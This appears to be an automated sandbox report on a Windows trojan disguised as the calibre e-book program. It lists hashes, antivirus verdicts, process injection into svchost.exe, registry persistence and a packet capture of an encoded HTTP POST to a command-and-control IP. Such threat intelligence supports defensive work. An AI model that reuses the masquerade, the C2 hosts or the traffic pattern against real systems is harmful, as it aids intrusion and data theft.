Analysis Date2015-08-28 08:16:51
MD5c0ccd2f116bb3ecb854bae0c44906f88
SHA1da63ba3e448338423942236c5ff009ea8d59589c

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0deec3c39c74ba1da9f64aa99e9d760e sha1: 1f9a69b3c9bfeed94dcb7bddfa5aaf634a7686a9 size: 42496
Section.rdata md5: 88e0acd75753b0a42463194f6a3d3c21 sha1: 8ce3003f685381d167e2dae3f2006e501e401413 size: 14848
Section.data md5: 794547c6077455cd6828dbfaa7b2c968 sha1: e21e819a5129c30ec2792e03aec38964565d6025 size: 227840
Section.rsrc md5: f027253ed254bbd2413d4fee3215d7fc sha1: f0fece9b5b36e1efc6bcdddb2779cee7ed55d6aa size: 54272
Section.reloc md5: 2ab1ebef9d0ac3f604ec43a917d541f3 sha1: acf1b8b5775c9e8b2f1612dbb261d46e675903f1 size: 5120
Timestamp2015-06-16 13:03:54
Pdb pathK:\types\fileheader\cursor\packet.pdb
VersionLegalCopyright: GNU GPL v3.0
InternalName: calibre
FileVersion: 2.13.0.0
CompanyName: calibre-ebook.com
LegalTrademarks: calibre is a registered U.S. trademark number 3,666,525
ProductName: calibre
ProductVersion: 2.13.0
FileDescription: The main calibre program
OriginalFilename: calibre.exe
PackerMicrosoft Visual C++ ?.?
PEhash3fb185f693fb3f5277b09c74c2684e2e27ef959b
IMPhashee3a4f578e84bd60505fdb57772d8d74
AVRising0x58f73039
AVMcafeeGenericR-DUT!C0CCD2F116BB
AVAvira (antivir)TR/Crypt.ZPACK.21629
AVTwisterTrojan.Girtk.DMOW.nujs
AVAd-AwareTrojan.GenericKD.2496955
AVAlwil (avast)Malware-gen:Win32:Malware-gen
AVEset (nod32)Win32/Kryptik.DMOW
AVGrisoft (avg)Crypt4.AVNX
AVSymantecno_virus
AVFortinetW32/Kryptik.DMOW!tr
AVBitDefenderTrojan.GenericKD.2496955
AVK7Trojan ( 004c60741 )
AVMicrosoft Security EssentialsTrojan:Win32/Kovter!rfn
AVMicroWorld (escan)Trojan.GenericKD.2496955
AVMalwareBytesTrojan.CryptoLocker
AVAuthentiumW32/Trojan.ZDSI-8945
AVFrisk (f-prot)no_virus
AVIkarusTrojan.Win32.Crypt
AVEmsisoftTrojan.GenericKD.2496955
AVZillya!Downloader.Dofoil.Win32.2171
AVKasperskyno_virus
AVTrend Microno_virus
AVCAT (quickheal)Trojan.Generic.B4
AVVirusBlokAda (vba32)TrojanDownloader.Dofoil
AVPadvishno_virus
AVBullGuardTrojan.GenericKD.2496955
AVArcabit (arcavir)Trojan.GenericKD.2496955
AVClamAVno_virus
AVDr. WebTrojan.DownLoader13.47485
AVF-SecureTrojan.GenericKD.2496955
AVCA (E-Trust Ino)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates Processsvchost.exe

Process
↳ svchost.exe

Creates Processsvchost.exe

Process
↳ svchost.exe

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\80744bde\964706c2 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
RegistryHKEY_LOCAL_MACHINE\software\80744bde\efea1db6 ➝
A683C7D6F442994D46BEAC684C067395\\x00
RegistryHKEY_CURRENT_USER\SOFTWARE\80744bde\964706c2 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_CURRENT_USER\software\80744bde\efea1db6 ➝
A683C7D6F442994D46BEAC684C067395\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1206 ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1206 ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\svchost.exe ➝
NULL
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Local Settings\Application Data\uvipe\uvipe.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\168.55.208[1].htm
Creates File\Device\Afd\AsyncConnectHlp
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Creates File\Device\Afd\Endpoint
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\microsoft[1].htm
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\658HSJSD\168.55.208[1].htm
Deletes Filec:\malware.exe
Creates Process"C:\WINDOWS\system32\svchost.exe"
Creates Process"C:\WINDOWS\system32\svchost.exe"
Creates Process"C:\WINDOWS\system32\svchost.exe"
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex47D12054
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates MutexGlobal\80744bde
Winsock DNSmicrosoft.com
Winsock DNS168.55.208.197

Process
↳ "C:\WINDOWS\system32\svchost.exe"

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\80744bde\964706c2 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\SOFTWARE\80744bde\964706c2 ➝
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)\\x00
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
RegistryHKEY_LOCAL_MACHINE\SOFTWARE\77A66B94CB08E688 ➝
77A66B94CB08E688\\x00
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\NetFx20SP1_x86.exe
Creates FilePIPE\wkssvc
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process"C:\Documents and Settings\Administrator\Local Settings\Temp\NetFx20SP1_x86.exe" /quiet /norestart
Winsock DNSdownload.microsoft.com

Process
↳ "C:\WINDOWS\system32\svchost.exe"

Creates Mutex11C1A349

Process
↳ "C:\WINDOWS\system32\svchost.exe"

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\NetFx20SP1_x86.exe" /quiet /norestart

Creates FileC:\WINDOWS\SYSTEM32\REDIR.EXE
Creates FileC:\WINDOWS\SYSTEM32\COMMAND.COM
Creates FileC:\WINDOWS\TEMP\scs2.tmp
Creates FileC:\WINDOWS\SYSTEM32\HIMEM.SYS
Creates FileC:\WINDOWS\SYSTEM32\DOSX.EXE
Creates FileC:\WINDOWS\SYSTEM32\MSCDEXNT.EXE
Creates FileC:\WINDOWS\TEMP\scs1.tmp
Creates FileC:\Documents and Settings\Administrator\Local Settings\TEMP\NETFX2~1.EXE
Deletes FileC:\WINDOWS\TEMP\scs1.tmp
Deletes FileC:\WINDOWS\TEMP\scs2.tmp

Network Details:

DNSmicrosoft.com
Type: A
134.170.185.46
DNSmicrosoft.com
Type: A
134.170.188.221
DNSa767.dscms.akamai.net
Type: A
23.3.98.41
DNSa767.dscms.akamai.net
Type: A
23.3.98.11
DNSwestocean.net
Type: A
DNSdownload.microsoft.com
Type: A
HTTP GEThttp://microsoft.com/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GEThttp://download.microsoft.com/download/0/8/c/08c19fa4-4c4f-4ffb-9d6c-150906578c9e/NetFx20SP1_x86.exe
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP POSThttp://168.55.208.197/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP192.168.1.1:1031 ➝ 134.170.185.46:80
Flows TCP192.168.1.1:1032 ➝ 23.3.98.41:80
Flows TCP192.168.1.1:1036 ➝ 188.71.33.155:8080
Flows TCP192.168.1.1:1033 ➝ 73.225.129.209:8080
Flows TCP192.168.1.1:1034 ➝ 168.55.208.197:80
Flows TCP192.168.1.1:1035 ➝ 152.214.58.170:80
Flows TCP192.168.1.1:1037 ➝ 165.127.193.148:80
Flows TCP192.168.1.1:1038 ➝ 25.21.223.35:80
Flows TCP192.168.1.1:1039 ➝ 168.55.208.197:80
Flows TCP192.168.1.1:1040 ➝ 133.214.42.205:80
Flows TCP192.168.1.1:1041 ➝ 172.29.162.119:80
Flows TCP192.168.1.1:1042 ➝ 82.138.123.58:80
Flows TCP192.168.1.1:1044 ➝ 206.226.10.85:80

Raw Pcap
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x00000020 (00032)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x00000030 (00048)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x00000040 (00064)   696e646f 7773204e 5420352e 313b2053   indows NT 5.1; S
0x00000050 (00080)   56313b20 2e4e4554 20434c52 20322e30   V1; .NET CLR 2.0
0x00000060 (00096)   2e353037 3237290d 0a486f73 743a206d   .50727)..Host: m
0x00000070 (00112)   6963726f 736f6674 2e636f6d 0d0a4361   icrosoft.com..Ca
0x00000080 (00128)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000090 (00144)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f646f77 6e6c6f61 642f302f   GET /download/0/
0x00000010 (00016)   382f632f 30386331 39666134 2d346334   8/c/08c19fa4-4c4
0x00000020 (00032)   662d3466 66622d39 6436632d 31353039   f-4ffb-9d6c-1509
0x00000030 (00048)   30363537 38633965 2f4e6574 46783230   06578c9e/NetFx20
0x00000040 (00064)   5350315f 7838362e 65786520 48545450   SP1_x86.exe HTTP
0x00000050 (00080)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000060 (00096)   3a204d6f 7a696c6c 612f342e 30202863   : Mozilla/4.0 (c
0x00000070 (00112)   6f6d7061 7469626c 653b204d 53494520   ompatible; MSIE 
0x00000080 (00128)   362e303b 2057696e 646f7773 204e5420   6.0; Windows NT 
0x00000090 (00144)   352e313b 20535631 3b202e4e 45542043   5.1; SV1; .NET C
0x000000a0 (00160)   4c522032 2e302e35 30373237 290d0a48   LR 2.0.50727)..H
0x000000b0 (00176)   6f73743a 20646f77 6e6c6f61 642e6d69   ost: download.mi
0x000000c0 (00192)   63726f73 6f66742e 636f6d0d 0a436163   crosoft.com..Cac
0x000000d0 (00208)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000e0 (00224)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   42                                    B

0x00000000 (00000)   77                                    w

0x00000000 (00000)   504f5354 202f2048 5454502f 312e310d   POST / HTTP/1.1.
0x00000010 (00016)   0a436f6e 74656e74 2d547970 653a2061   .Content-Type: a
0x00000020 (00032)   70706c69 63617469 6f6e2f78 2d777777   pplication/x-www
0x00000030 (00048)   2d666f72 6d2d7572 6c656e63 6f646564   -form-urlencoded
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000050 (00080)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000060 (00096)   7469626c 653b204d 53494520 362e303b   tible; MSIE 6.0;
0x00000070 (00112)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000080 (00128)   20535631 3b202e4e 45542043 4c522032    SV1; .NET CLR 2
0x00000090 (00144)   2e302e35 30373237 290d0a48 6f73743a   .0.50727)..Host:
0x000000a0 (00160)   20313638 2e35352e 3230382e 3139370d    168.55.208.197.
0x000000b0 (00176)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x000000c0 (00192)   20333830 0d0a4361 6368652d 436f6e74    380..Cache-Cont
0x000000d0 (00208)   726f6c3a 206e6f2d 63616368 650d0a0d   rol: no-cache...
0x000000e0 (00224)   0a645446 46325a59 38574558 7975735a   .dTFF2ZY8WEXyusZ
0x000000f0 (00240)   394d324b 55566734 38336243 4873366c   9M2KUVg483bCHs6l
0x00000100 (00256)   67774c79 4f596b53 76467338 5358684d   gwLyOYkSvFs8SXhM
0x00000110 (00272)   49595854 335a2b5a 624a3853 556e6c31   IYXT3Z+ZbJ8SUnl1
0x00000120 (00288)   58397052 6a2b5a74 664e5069 44743575   X9pRj+ZtfNPiDt5u
0x00000130 (00304)   38303671 64514276 687a526e 724b4c42   806qdQBvhzRnrKLB
0x00000140 (00320)   46523736 5a574b47 716c4345 686a6b4b   FR76ZWKGqlCEhjkK
0x00000150 (00336)   78786769 6c69472b 657a7161 4b386272   xxgiliG+ezqaK8br
0x00000160 (00352)   75725242 57357243 397a4175 70443846   urRBW5rC9zAupD8F
0x00000170 (00368)   6e36526e 6e413645 7333514d 6b556d6a   n6RnnA6Es3QMkUmj
0x00000180 (00384)   5a6e3775 696c4836 3750686f 79516955   Zn7uilH67PhoyQiU
0x00000190 (00400)   59383541 36714c47 58664548 5673462b   Y85A6qLGXfEHVsF+
0x000001a0 (00416)   6b4a5a73 6e34504e 55444833 47556738   kJZsn4PNUDH3GUg8
0x000001b0 (00432)   38364d55 494d714b 2b6c4259 48787766   86MUIMqK+lBYHxwf
0x000001c0 (00448)   63556876 516e306f 56574e5a 576b4835   cUhvQn0oVWNZWkH5
0x000001d0 (00464)   384f5653 59794b41 50554233 31307a63   8OVSYyKAPUB310zc
0x000001e0 (00480)   4a693668 616b424c 79653273 502f6962   Ji6hakBLye2sP/ib
0x000001f0 (00496)   394f7877 67795845 73346d43 72574d42   9OxwgyXEs4mCrWMB
0x00000200 (00512)   33746748 44494841 792f6842 5a373057   3tgHDIHAy/hBZ70W
0x00000210 (00528)   7766482b 70653764 494f6d6a 52315545   wfH+pe7dIOmjR1UE
0x00000220 (00544)   4c72786f 37476769 4a427579 4f6f2f54   Lrxo7GgiJBuyOo/T
0x00000230 (00560)   4c764864 56477373 79774476 584d5a4f   LvHdVGssywDvXMZO
0x00000240 (00576)   736d5538 4b326e72 4b78744a 715a6b54   smU8K2nrKxtJqZkT
0x00000250 (00592)   4b79666f 30706246 426b2b34 3d         Kyfo0pbFBk+4=

0x00000000 (00000)   37                                    7

0x00000000 (00000)   79                                    y

0x00000000 (00000)   46                                    F

0x00000000 (00000)   34                                    4

0x00000000 (00000)   70                                    p

0x00000000 (00000)   4d                                    M

0x00000000 (00000)   aa                                    .

0x00000000 (00000)   a1                                    .


Strings